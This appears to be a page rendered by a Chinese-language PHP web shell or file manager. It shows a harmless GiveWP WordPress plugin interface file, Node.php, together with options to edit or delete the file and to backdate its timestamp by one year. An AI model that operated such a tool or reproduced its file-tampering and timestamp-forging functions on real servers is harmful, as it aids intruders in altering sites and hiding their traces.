文件操作 - Node.php
返回文件管理
返回主菜单
删除本文件
文件: /home/www/public/wp-content/plugins/give/src/Framework/FieldsAPI/Contracts/Node.php
编辑文件内容
<?php namespace Give\Framework\FieldsAPI\Contracts; use JsonSerializable; interface Node extends JsonSerializable { /** * The primitive node type, one of "field", "element", or "group". * * @since 2.22.0 */ public function getNodeType(): string; /** * Get the field’s type. */ public function getType(): string; /** * Get the node’s name. */ public function getName(): string; /** * {@inheritdoc} */ #[\ReturnTypeWillChange] public function jsonSerialize(); }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件